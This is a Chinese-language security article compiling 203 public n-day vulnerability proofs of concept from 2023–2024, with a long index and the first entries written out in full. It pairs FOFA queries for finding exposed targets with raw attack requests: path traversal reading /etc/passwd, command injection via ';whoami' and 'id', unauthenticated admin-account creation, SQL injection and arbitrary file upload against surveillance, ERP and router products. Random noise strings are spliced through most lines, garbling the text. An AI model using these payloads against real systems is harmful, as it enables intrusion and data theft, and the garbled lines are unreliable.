互联网公开漏洞整理202309-2024068 \$ X v1 }( C4 H( o" [
道一安全 2024-06-05 07:41 北京
1 y) s0 N8 Q! s& c# [% L以下文章来源于网络安全新视界 ,作者网络安全新视界. E* F/ l. w0 _8 C$ D4 w& d
, K m2 M9 V3 Y! |8 K
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
' }3 W$ E7 j6 A* K& ?1 ^/ m* O3 e8 W5 L+ Z4 F% g
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
9 I$ | x* B+ Z" S
' U6 u3 A# |. v. z3 e安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。8 r; B2 K/ ~ e! T
% O; `7 C$ H; i& `文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。" }1 z. y6 }( u7 V$ o8 K" B0 x
" F5 S/ n' {4 L P; m# y合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。6 M! u, g( |# W/ L G1 q1 A
+ }7 q9 j( ^3 _7 A m' t
" W H K' |+ K/ H0 V5 v: O3 t' p声明! f$ B4 d- k' w6 N& J4 l6 ~
* q4 i( h1 g' e) G9 W4 C' n8 W/ x2 }为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。! b7 P# P+ ?( P5 T
8 S+ z7 z* C3 T! ]有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。) _+ Q1 C; W' O4 B
- r2 M1 C+ T3 z
3 h, t# I* e& h2 ]% A
' E8 U6 \: z: U
目录* e$ c5 l4 x# f9 l. @2 |0 ]2 b
1 h0 o2 W8 Y$ G# \( z+ |: ?01( l; k# Y2 ~' B- a+ f( c. J. Q
' c. E3 e( P4 s1 Z
1. StarRocks MPP数据库未授权访问. j8 m: t5 N- u; j
2. Casdoor系统static任意文件读取
- m" m$ K9 W/ Q% G/ G: @# O0 E3. EasyCVR智能边缘网关 userlist 信息泄漏
U" I' }: ~4 z4. EasyCVR视频管理平台存在任意用户添加0 q- p# O! ^) \+ h* o; z0 \
5. NUUO NVR 视频存储管理设备远程命令执行
' n4 X- u& {) }6. 深信服 NGAF 任意文件读取; J0 d4 e: o3 x Y& C
7. 鸿运主动安全监控云平台任意文件下载
- {* }4 I j X8. 斐讯 Phicomm 路由器RCE
4 e, b& }- G1 D+ M8 n1 D* r9. 稻壳CMS keyword 未授权SQL注入0 e/ C# v) l' D" B' Q
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传! X6 D. o& b [. `4 S
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入 j% @; W1 j- J$ `7 w1 c
12. Jorani < 1.0.2 远程命令执行! I1 n0 ]( v7 x2 Z( f
13. 红帆iOffice ioFileDown任意文件读取
5 s) H. t- `; R- v3 h) x14. 华夏ERP(jshERP)敏感信息泄露
4 F6 ~- C; [' m3 b3 i% s15. 华夏ERP getAllList信息泄露8 }6 I' U5 v" a5 r3 n# w: i5 {
16. 红帆HFOffice医微云SQL注入
* s8 O* c! n5 f5 ^17. 大华 DSS itcBulletin SQL 注入
7 x, F8 M9 Z- ]8 s' Z18. 大华 DSS 数字监控系统 user_edit.action 信息泄露0 L( N9 w1 K' n7 B
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入& _ h6 c6 M/ D- h' I5 N/ E( F# R
20. 大华ICC智能物联综合管理平台任意文件读取( [+ T# X2 q; L9 y' k
21. 大华ICC智能物联综合管理平台random远程代码执行
% E3 i; N# S- s! G5 A& p22. 大华ICC智能物联综合管理平台 log4j远程代码执行8 K( ^" B% Y$ l- E9 d# D
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行5 ~$ o! e0 |. q8 I' n) u" _9 [
24. 用友NC 6.5 accept.jsp任意文件上传& M1 b$ w& H' j- N
25. 用友NC registerServlet JNDI 远程代码执行* ?8 B! K" g+ C: P C
26. 用友NC linkVoucher SQL注入
8 x: U- R' u/ K4 Z' x8 |& B27. 用友 NC showcontent SQL注入/ t. L& v# b5 }3 _, G+ W
28. 用友NC grouptemplet 任意文件上传4 {& Y/ k% c8 q U% q4 [
29. 用友NC down/bill SQL注入 a* w7 M0 M. ~
30. 用友NC importPml SQL注入
. }/ `4 M1 k/ g6 b" E31. 用友NC runStateServlet SQL注入 B0 w6 ^2 J$ S1 F- |% t; S
32. 用友NC complainbilldetail SQL注入
. g* T6 [- c5 ]3 O33. 用友NC downTax/download SQL注入. g; C! g4 |; _
34. 用友NC warningDetailInfo接口SQL注入
( I1 k( p% F) x# s35. 用友NC-Cloud importhttpscer任意文件上传
8 v6 E2 p# @- C' \36. 用友NC-Cloud soapFormat XXE
2 B9 b# V4 U/ ]( s* N37. 用友NC-Cloud IUpdateService XXE
: T4 ~ B, X! `& b6 X9 d9 F38. 用友U8 Cloud smartweb2.RPC.d XXE8 _* n v2 Y- _9 c/ `
39. 用友U8 Cloud RegisterServlet SQL注入
* E8 p0 X7 V( {/ ^; o/ G% z' R3 R- }40. 用友U8-Cloud XChangeServlet XXE
2 N1 q! l' D( X: n- l41. 用友U8 Cloud MeasureQueryByToolAction SQL注入; K, d0 e; I4 i; }+ }3 @7 i
42. 用友GRP-U8 SmartUpload01 文件上传6 N. S; ~' K4 l' J2 g9 r
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
( `; W" \' Y- D' i( P; P s% I44. 用友GRP-U8 bx_dj_check.jsp SQL注入! o1 F( u& L, W2 s+ b
45. 用友GRP-U8 ufgovbank XXE+ q/ p# O% G- X$ o9 U5 U" u. A# q/ D# x
46. 用友GRP-U8 sqcxIndex.jsp SQL注入& n& I; Q9 j( B" b4 b' b3 L
47. 用友GRP A++Cloud 政府财务云 任意文件读取2 ]( C& l& n8 N) _% ^, y& X; t# I
48. 用友U8 CRM swfupload 任意文件上传3 o1 V5 e% v( x X. b# p
49. 用友U8 CRM系统uploadfile.php接口任意文件上传0 h Z; T! O* N% j9 J5 N, V
50. QDocs Smart School 6.4.1 filterRecords SQL注入9 b; a7 L& e' k7 s
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入+ j" S6 |6 ]3 Y! g7 {) F \" x6 Y
52. 泛微E-Office json_common.php sql注入( P# ^- v4 e( Y
53. 迪普 DPTech VPN Service 任意文件上传
' Z+ v. F: J: {. B# K54. 畅捷通T+ getstorewarehousebystore 远程代码执行3 v7 e0 Q$ j2 E& ^4 g" ]* H0 S
55. 畅捷通T+ getdecallusers信息泄露
2 B' q3 T/ I6 E56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE$ D/ r0 Y# Q' B* ^2 z8 C1 @8 Q
57. 畅捷通T+ keyEdit.aspx SQL注入
6 M! b$ o6 [+ x1 d. n6 z6 \( M* H58. 畅捷通T+ KeyInfoList.aspx sql注入
5 G; S4 D) p7 {% {$ ~59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
$ Q6 i: e3 B" ^, ~4 H60. 百卓Smart管理平台 importexport.php SQL注入7 S+ ^2 P0 k. R6 c$ Z& ]! ]
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 g" s0 Q- k* O; a
62. IP-guard WebServer 远程命令执行 @' z1 y6 {- \& o" n8 X3 }/ s
63. IP-guard WebServer任意文件读取
# n) l+ u/ \7 H64. 捷诚管理信息系统CWSFinanceCommon SQL注入
1 i/ l' I- D: B. p3 a6 K) d65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
* P% _- R% ?3 ^' O; [8 [$ X66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
2 l8 F+ A* |0 g x6 x67. 万户ezOFFICE wpsservlet任意文件上传
8 D" h/ }8 v3 Q9 w& L' E$ M68. 万户ezOFFICE wf_printnum.jsp SQL注入* {% w2 G; R2 U
69. 万户 ezOFFICE contract_gd.jsp SQL注入
" @ ^1 {7 X$ a. h3 q70. 万户ezEIP success 命令执行) I' I' A$ @' }* y" h' J# T4 d
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入# s. h# k3 K" t+ h- P9 z
72. 致远OA getAjaxDataServlet XXE C7 O+ G* ~0 w' r6 C
73. GeoServer wms远程代码执行0 U* r% ]8 E8 Z( C
74. 致远M3-server 6_1sp1 反序列化RCE; Z/ F, C6 v% A3 E3 V
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
* K, A n+ v3 [' t0 c& K; s76. 新开普掌上校园服务管理平台service.action远程命令执行* `5 [. h- c A. ]% M
77. F22服装管理软件系统UploadHandler.ashx任意文件上传6 o( @' X1 }% z w
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
( j% L% c! y8 {& B79. BYTEVALUE 百为流控路由器远程命令执行
& r0 j# k2 D0 X' e% g' C80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
& j8 @8 A. |5 G9 W0 D% U- p81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
! e) ^# p: P9 x8 u& ]5 V# A82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行1 F, @8 P. a7 b' \- A9 x# I& R
83. JeecgBoot testConnection 远程命令执行
; G i3 H, y5 E ]0 L2 H84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
0 ~3 V7 s% I* H1 l85. SysAid On-premise< 23.3.36远程代码执行- i% l, X! @6 I
86. 日本tosei自助洗衣机RCE8 Y: e4 J& b/ b5 j5 [ L& z# T/ j) J
87. 安恒明御安全网关aaa_local_web_preview文件上传
2 x# A8 f3 M4 z& o6 f! k# p88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行! D1 r- a7 g/ V* H! E
89. 致远互联FE协作办公平台editflow_manager存在sql注入/ d" K) R0 L; d4 F2 C
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
% B3 M) a/ C8 A+ ~# a$ |91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
4 Y( L$ y; J1 B) T8 q* k/ C y v. C$ B92. 海康威视运行管理中心session命令执行3 T- @7 f7 P7 Q# S3 Q
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
7 o- I" q. X# d94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传" g/ d4 {6 j3 A5 d' l( u& N# d
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行# \ U$ |: J/ K
96. Apache OFBiz 18.12.11 groovy 远程代码执行" {3 ]9 k. H0 D5 G8 E; r
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行& j. S- k& ~3 n3 T6 p$ d+ B
98. SpiderFlow爬虫平台远程命令执行
; X, g" M) }6 T% w8 r. e99. Ncast盈可视高清智能录播系统busiFacade RCE
# J) j }5 s8 U: @ H- C( p100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
* x X+ x, a; V. n! |; C3 o# S101. ivanti policy secure-22.6命令注入0 e$ J+ |" [. ?8 H" I+ ?
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
" X1 G: F/ \. C4 @/ l103. Ivanti Pulse Connect Secure VPN XXE
$ b: q) A1 j" T0 j* |4 F104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
$ B& \. `: J$ C$ |" p; w105. SpringBlade v3.2.0 export-user SQL 注入! Y8 U. Y4 ~7 [7 D9 b
106. SpringBlade dict-biz/list SQL 注入
! y6 s8 X# u$ }1 A y. ]107. SpringBlade tenant/list SQL 注入
0 j. ?: @' V' H; B* U; j+ z1 V) D108. D-Tale 3.9.0 SSRF
5 t6 M- f: B3 }) F1 o109. Jenkins CLI 任意文件读取
% a# w4 d' \& S) h! H7 t( a& e110. Goanywhere MFT 未授权创建管理员! M6 \* J' k: T4 b/ O* g8 ~
111. WordPress Plugin HTML5 Video Player SQL注入
/ F& |1 b& d; c% o7 d+ g, f3 \8 O112. WordPress Plugin NotificationX SQL 注入
8 \! Q# I7 O3 l0 f' Q113. WordPress Automatic 插件任意文件下载和SSRF( p: ]' f: s5 {/ e. ]0 \5 x. `8 l
114. WordPress MasterStudy LMS插件 SQL注入
: X0 y5 X, M2 n115. WordPress Bricks Builder <= 1.9.6 RCE" |2 K7 [5 W N6 a ^6 a
116. wordpress js-support-ticket文件上传" U6 H1 s! F+ N$ J% [! v( F4 Q
117. WordPress LayerSlider插件SQL注入
, J4 l9 A+ i, O118. 北京百绰智能S210管理平台uploadfile.php任意文件上传" a& f* O' M) b% M# d* Q
119. 北京百绰智能S20后台sysmanageajax.php sql注入
8 J: P1 H4 [; G% A120. 北京百绰智能S40管理平台导入web.php任意文件上传9 x+ A" ^# ?" L
121. 北京百绰智能S42管理平台userattestation.php任意文件上传" x/ [4 r( w9 v' }' r+ h
122. 北京百绰智能s200管理平台/importexport.php sql注入5 s# }# @! b" ~- D$ }; ?
123. Atlassian Confluence 模板注入代码执行+ X, d( r$ b' _! J& [6 g! N
124. 湖南建研工程质量检测系统任意文件上传6 A9 r/ t2 {$ r# N4 D- p a' I
125. ConnectWise ScreenConnect身份验证绕过
- p0 M8 C* b" K8 a6 W( z3 J126. Aiohttp 路径遍历+ T- V$ _. V" F7 q- J7 n
127. 广联达Linkworks DataExchange.ashx XXE3 {. H! Y8 r+ M. {# X
128. Adobe ColdFusion 反序列化
3 W( B8 ~) L% N( f129. Adobe ColdFusion 任意文件读取
- r) s3 P6 X+ {* G* a6 ~130. Laykefu客服系统任意文件上传
4 U- u' h1 k- s9 C131. Mini-Tmall <=20231017 SQL注入
* _$ L+ w2 m I: t' K( z4 ~# q, t132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; ]1 T; t) \! e
133. H5 云商城 file.php 文件上传2 t/ {5 t! x3 y$ x% ~0 q8 L8 l
134. 网康NS-ASG应用安全网关index.php sql注入
# {) [8 ]& R$ k5 `$ e3 L. P135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入$ K( N7 H; `7 q ]6 U9 C- n
136. NextChat cors SSRF
/ ]% B, b& `- z' \7 L6 G137. 福建科立迅通信指挥调度平台down_file.php sql注入) A- E; ~2 Q4 z* y% M' D1 l6 |+ T
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入. n! S7 s1 t3 H
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
: l! N" {. @% {140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
6 ]! B3 W H7 I: T; _. g141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入: J1 o/ b1 L! q& `0 |' d1 x
142. CMSV6车辆监控平台系统中存在弱密码
& j7 D' {7 K7 V6 Y2 R143. Netis WF2780 v2.1.40144 远程命令执行5 ]8 ~ Y1 O6 X! L0 J3 v2 c
144. D-Link nas_sharing.cgi 命令注入
3 S& c& S) c( a, ^145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
) \' d, X. A- w5 x* Z146. MajorDoMo thumb.php 未授权远程代码执行
9 U2 { J- H4 {% x" V' N6 |1 W& a4 X147. RaidenMAILD邮件服务器v.4.9.4-路径遍历; K) e& c% t- J$ P
148. CrushFTP 认证绕过模板注入
" C1 N/ w0 u' p149. AJ-Report开源数据大屏存在远程命令执行
: b6 t* M2 [; l6 y- j: ^, ?150. AJ-Report 1.4.0 认证绕过与远程代码执行
$ I* x. x9 n* P. W' l151. AJ-Report 1.4.1 pageList sql注入
. n8 ?8 ?% l6 _3 t! Y152. Progress Kemp LoadMaster 远程命令执行& S. I7 i/ t3 d% y0 `
153. gradio任意文件读取
& l9 E% C' ^5 h+ m1 T" F" s154. 天维尔消防救援作战调度平台 SQL注入( p$ ~9 l2 l$ t% e4 N9 @
155. 六零导航页 file.php 任意文件上传9 t. h" }, Y1 H$ w
156. TBK DVR-4104/DVR-4216 操作系统命令注入
9 r- F8 r& W z, n' K1 b' i157. 美特CRM upload.jsp 任意文件上传" H2 W; E# J% w$ I
158. Mura-CMS-processAsyncObject存在SQL注入
6 h! C; W( x# }: ~. N159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
& y4 q. z; P; y$ F) |( L- q3 I160. Sonatype Nexus Repository 3目录遍历与文件读取+ \" j8 I! l& y; ?3 f: a7 X8 r
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传# @! o7 H0 ^" j0 x- H. G
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传/ M! D/ ]$ z! ~1 o
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
* v+ }: W7 y) W1 G& V5 W B m164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传; n1 r3 r, G( M7 \3 s6 \$ ~
165. OrangeHRM 3.3.3 SQL 注入
: m8 J7 O6 P; U, H0 n166. 中成科信票务管理平台SeatMapHandler SQL注入
/ }% g8 Z: d1 n! s; W. [' M; t167. 精益价值管理系统 DownLoad.aspx任意文件读取 v0 Q$ c$ k6 G6 `6 w
168. 宏景EHR OutputCode 任意文件读取) D2 P o9 v, O* r2 x, C& P9 j
169. 宏景EHR downlawbase SQL注入2 {- i% d( [$ O/ L' M7 }
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
* A- q* G/ x% ^! }2 B5 m5 m1 l. v& D171. 通天星CMSV6车载定位监控平台 SQL注入; ~4 {% U. g/ B5 z. T: r' l
172. DT-高清车牌识别摄像机任意文件读取
) t( r, N5 e( ?) N8 A173. Check Point 安全网关任意文件读取% v6 q: u" O8 B2 c
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
2 ]7 r; t7 H, t z2 B$ t0 s: a175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
' p) }. a! [* Z3 }176. 电信网关配置管理系统 rewrite.php 文件上传5 a* Y* n, _6 W1 Y, S
177. H3C路由器敏感信息泄露" i+ ~: Y8 a! C5 ?% B1 F
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
( b' U/ k+ Z( F/ g179. 建文工程管理系统存在任意文件读取
. c* o8 v9 R& U9 w180. 帮管客 CRM jiliyu SQL注入
; Q% I! L' w! I/ ^181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入/ K U2 ^; R( i& O( R
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建4 @) f3 J( |# C# b* |
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入 j3 H1 W6 p$ ?4 s- I- X
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
# e$ [$ p: m, B, r8 y0 m185. 瑞友天翼应用虚拟化系统SQL注入! Y0 p y5 N( P) z4 J: C) l+ z
186. F-logic DataCube3 SQL注入
& F2 `5 d7 ~" _( F187. Mura CMS processAsyncObject SQL注入
; v: ^$ V4 |! G' v% I* v: Z188. 叁体-佳会视频会议 attachment 任意文件读取! F3 g/ v4 m6 M: M4 T% |" v+ O0 v
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
; O; B! r4 \7 c0 A190. 短视频矩阵营销系统 poihuoqu 任意文件读取0 \: f% Q0 y. K- q
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入( S# |7 {6 t& b- B1 \
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
5 D/ E: D/ r1 d7 B8 n1 {193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
$ k$ s, w% j) [3 J194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传3 D- g b! F* V# V& h i
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
" m6 p6 g# M' Q1 H% g: a196. 河南省风速科技统一认证平台密码重置) C( c; n. R: {$ M8 B
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
) }7 M" C M! F198. 阿里云盘 WebDAV 命令注入
9 r" k) S* p' l& B8 `+ q% H+ ~199. cockpit系统assetsmanager_upload接口 文件上传
- H8 l. `+ I1 X2 E200. SeaCMS海洋影视管理系统dmku SQL注入
1 {7 ?4 j5 m$ r3 F) o201. 方正全媒体新闻采编系统 binary SQL注入
$ t9 F/ [; S0 J. r8 K. _202. 微擎系统 AccountEdit任意文件上传
, a! C+ Z0 h: I! e( {" r4 R; a5 A& B203. 红海云EHR PtFjk 文件上传
! n1 c( g' y4 T" g
: b1 N; G) M( xPOC列表/ |) R/ R: V. w! Z4 z& e
/ l8 ]& O% U1 y4 b02" L$ J9 D2 E2 W9 |
& Z( r7 S7 r* y, c% h1 C1. StarRocks MPP数据库未授权访问
) V) A. A6 k& s' k; T5 DFOFA :title="StarRocks"$ L# m6 ?! X) X9 A
GET /mem_tracker HTTP/1.1, r; R8 s+ g& E8 c
Host: URL0 X; N1 j, G4 m( W. j& [
0 z) S# N; P0 m, F1 H5 H6 l: B" ?; e
# J+ u0 g, p1 h+ V6 {, G
2. Casdoor系统static任意文件读取
) v: V; V5 I0 I9 O" y2 P' nFOFA :title="Casdoor"
' G8 X( `0 Z8 Q$ Q2 V# ?, z- QGET /static/../../../../../../../../../../../etc/passwd HTTP/1.17 b* X! i7 i2 V
Host: xx.xx.xx.xx:9999
0 h% ~2 U; L+ I$ {+ ]User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 `$ [5 Z9 w! L4 y; m" V
Connection: close' \ r2 ?* T8 n5 s) A
Accept: */*
2 v2 ~5 k" d M- H4 c$ XAccept-Language: en
. v8 F3 u0 P& v& T9 Y- M8 ?" I# XAccept-Encoding: gzip
& M5 M- V) `! J' Q2 M9 H _7 ~2 d
1 p/ o: t S4 B4 D% j4 g- ~3. EasyCVR智能边缘网关 userlist 信息泄漏+ ^ H5 u* h( I# ?4 {
FOFA :title="EasyCVR"
9 B& g) T( G/ N% B3 w; L5 \) aGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1. C' \5 e+ V$ w( n! l0 t
Host: xx.xx.xx.xx5 A+ @. V" B1 Q+ h c1 x. j
* Y( _7 @- Y! A6 o8 c$ Q( X+ S1 [) l0 K& Z a3 O& W: D! B
4. EasyCVR视频管理平台存在任意用户添加+ z6 p; E3 `& m% }: W4 @
FOFA :title="EasyCVR"$ t3 j" Q" |+ ]7 ]* X6 R2 o g
) J# {5 g, W" g# u+ @% o1 f2 z% l$ Y m
password更改为自己的密码md5/ ~* i' k/ ?! g
POST /api/v1/adduser HTTP/1.1
9 ^% o! `2 R( D' NHost: your-ip
6 m0 V _& v0 N8 M: b. E% ?9 mContent-Type: application/x-www-form-urlencoded; charset=UTF-8
+ w7 W- J V5 J2 D$ I; P* H G& P7 I& I# ]% f* p
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
/ S6 Y9 F- D5 B0 ^0 ?: I. v- V! s% o! L! m$ w0 \" c& U
2 [; }' |% V% Z' V5 s J# U, _
5. NUUO NVR 视频存储管理设备远程命令执行
& W; M, B3 S9 f- F3 W% u' P- |FOFA:title="Network Video Recorder Login"( g& k/ b" _( v" N
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
/ p2 o2 _7 m# |& P2 D! M3 nHost: xx.xx.xx.xx
* f+ E- y/ T0 P- R2 n0 q: B4 T6 G% F% R7 c& [
@% u0 J& p; V. x! W
6. 深信服 NGAF 任意文件读取
5 P; d" i5 \# H1 kFOFA:title="SANGFOR | NGAF"
/ \6 @1 b, O" E1 [( sGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
& c: K! P8 S* z6 CHost:. ^" [- S; f. M1 P& }' Z3 k
% D6 g" V2 n7 {) ~1 Z2 M# S
1 v' R) I1 o- N& U) ^7 q/ D4 h" @7. 鸿运主动安全监控云平台任意文件下载
% _ [6 J( R) d* Z, e' }* v aFOFA:body="./open/webApi.html"
' w1 d6 @3 ~4 ^% Z+ ZGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.15 @) D& }6 _9 Q& [' [2 u) U3 W1 ?4 n
Host:8 {5 A2 z/ ^3 Q
# I0 u m8 R( W4 w
1 K" @! F$ x7 D6 f3 T z8 b8. 斐讯 Phicomm 路由器RCE6 O$ }% a4 U) E5 N7 ^
FOFA:icon_hash="-1344736688"
( _1 J+ v2 l# D0 [9 J9 k默认账号admin登录后台后,执行操作. c' F* `8 P: m! O, L, w% ~
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
4 d7 v- L. a& E* KHost: x.x.x.x$ B+ o* ~8 K! W' g6 A* g
Cookie: sysauth=第一步登录获取的cookie2 n4 m6 H+ R* V8 P: v8 ~& T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
1 K) M; c; T8 n0 X1 ~: a' a; zUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36* [% { w3 J9 H0 V8 R+ E9 E, q1 }
! k* r& p9 Z# h3 x1 e6 |$ P------WebKitFormBoundaryxbgjoytz% P% p3 n9 N; n* o" K5 T
Content-Disposition: form-data; name="wifiRebootEnablestatus"0 m* ?% X, M5 s# j
, K1 \% m! a( r2 c" ^%s6 x3 `1 u1 l5 Z& l& o& u
------WebKitFormBoundaryxbgjoytz9 @% o& n# ~3 w
Content-Disposition: form-data; name="wifiRebootrange", `+ ~; O, q$ S+ H/ p& h
2 _/ U0 J& M( T" P! C) s12:00; id;
2 M) N9 R! Q0 O7 y4 L) }! w------WebKitFormBoundaryxbgjoytz
' r, [0 p: J6 E) z e$ |Content-Disposition: form-data; name="wifiRebootendrange"
4 h+ I% l" j% B* w6 Q. ~* @
. N5 N* R1 t2 j5 s! o# O" L% F%s:' P& |( W& U( V" }' d; x7 p% h
------WebKitFormBoundaryxbgjoytz
# ]% F$ S1 |) K/ f2 E& nContent-Disposition: form-data; name="cururl2"
- x0 J/ x, X1 C4 f1 F2 l1 d
- z) y# }! \: ~% I3 e" \4 N6 a2 D
/ f8 {, F3 W( X; D' A------WebKitFormBoundaryxbgjoytz--: x+ O- x; k) Q, T6 Z- I
" E2 ^$ A d! ?/ _+ a4 z! V- d7 s
& j, i$ b9 k/ ^/ N) p5 g
9. 稻壳CMS keyword 未授权SQL注入, R) y+ H3 E# W* l2 X: q
FOFA:app="Doccms"
3 e+ [& ^. i1 n. mGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1; o7 Q: r4 b ~+ o' q9 |
Host: x.x.x.x
2 I* U* |: |8 n. I5 N( \& ~) x/ j: _' t
* t% H) f( M4 Y- B2 a3 n
payload为下列语句的二次Url编码* l3 n7 r2 [2 D
m( O: P3 V2 [% m/ Y' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#1 x l! n( m- J$ S' { v+ E) F! O
" K- A8 N/ ]$ k$ S; U0 Z2 h
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传7 C' V% o: w5 f7 A0 P' `9 \
FOFA:icon_hash="953405444"( t2 k+ k; G$ {* t
2 R* M! r3 ]! ]6 D文件上传后响应中包含上传文件的路径
1 L0 ?9 D4 B v. t" o) f1 BPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
4 R( [0 ]9 h0 C9 [/ h2 BHost: x.x.x.x:xx
4 M- {+ `) h: W' H: r/ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.364 k% j2 C& u9 Z' T8 U
Content-Length: 1977 k& B' ^ U; u2 a# T- U# {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.95 |9 @) Q1 l7 {7 Q4 {: G% e
Accept-Encoding: gzip, deflate
: ?5 v4 Q' T B' X) ^Accept-Language: zh-CN,zh;q=0.9! Q& j( p- V* l. Y
Connection: close& m+ u* Q: d1 K4 }5 y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
) S% v4 B3 k$ W. Y1 m; O1 K3 t7 ^4 `
2 ?) o. @5 Z& e* K0 I8 \4 `------WebKitFormBoundaryxdgaqmqu
7 _, y& i V# E( fContent-Disposition: form-data; name="file"filename="icfitnya.txt"# a) a, H9 a2 A1 {5 y
Content-Type: text/html, E' `6 j5 T, B
" K+ G% P+ `# d" R" b: _jmnqjfdsupxgfidopeixbgsxbf
- b" U! l4 _1 `' ?- K( R7 @6 w------WebKitFormBoundaryxdgaqmqu--7 T! b6 R3 ^2 r+ J$ M2 r1 s0 w! N
0 K# h; F! y3 ?6 n
( }( w4 h) c* }. t% k% m, `& p3 N11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
, r! ]- x0 z6 y8 b; b5 tFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
